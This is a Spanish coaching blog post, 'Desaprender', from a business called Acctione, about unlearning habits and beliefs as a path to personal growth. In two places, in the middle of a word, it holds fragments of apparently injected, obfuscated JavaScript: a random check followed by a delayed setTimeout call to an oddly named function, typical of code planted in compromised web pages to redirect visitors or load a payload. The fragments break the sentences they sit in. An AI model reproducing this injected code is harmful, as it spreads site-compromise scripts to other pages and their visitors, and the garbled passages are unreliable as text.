DESAPRENDER

Home / Noticias / DESAPRENDER

 

¿Cómo volver a conectar con el ser que somos y que siempre hemos sido?

Nos hemos acostumbrado a llevar una vida determinada y no es fácil cambiar ciertos hábitos. Cambiar exige  esfuerzo y nos resulta incómodo. Además quien nos conoce ya tiene una imagen grabada de nosotros, y cualquier cambio podría ser motivo de comentarios u opiniones  que no sean de nuestro agrado. Todo lo aprendido y experimentado nos puede ser muy útil, pero también puede representar una carga que llevamos a cuestas si nos impide avanzar, crecer, evolucionar. Y ahí estamos en ocasiones, dudandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ando si hacemos un cambio, y nos arriesgamos sabiendo que a pesar de las dificultades que nos encontremos por el camino, tendremos la oportunidad de descubrir nuevos horizontes.

Lo mismo pasa con nuestras creencias, fundadas en ideas que nos inculcaron desde la educación recibida, la cultura a la que pertenecemos, la familia, la sociedad, los medios…vale la pena plantearse cuánto hay en nosotros de esas creencias, si nos identifican con nuestro ser interior, con nuestros valores.

El camino del crecimiento personal es doloroso porque adentrar en tu historia puede llevarte a episodios de tu vida que tenías olvidados. Puede que no te apetezca revivir momentos que quedaron detrás de una cortina en tu subconsciente, pero si te atreves a caminar por tu interior sin emitir juicios, tan sólo observandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ando qué hay, saldrás recompensad@. Habrás hecho limpieza y el empoderamiento que se generará en ti, dará paso a ese cambio que en realidad deseas, y sin demora, no desearás posponerlo más.

Así es como irás desaprendiendo para poder tomar al fin las riendas de esa vida que deseas.

¿Cuándo quieres empezar? ¿Estás preparad@?

Desde Acctione te podemos acompañar es tu proceso de cambio. A ese proceso le llamamos Coaching.

 

Un abrazo desde el corazón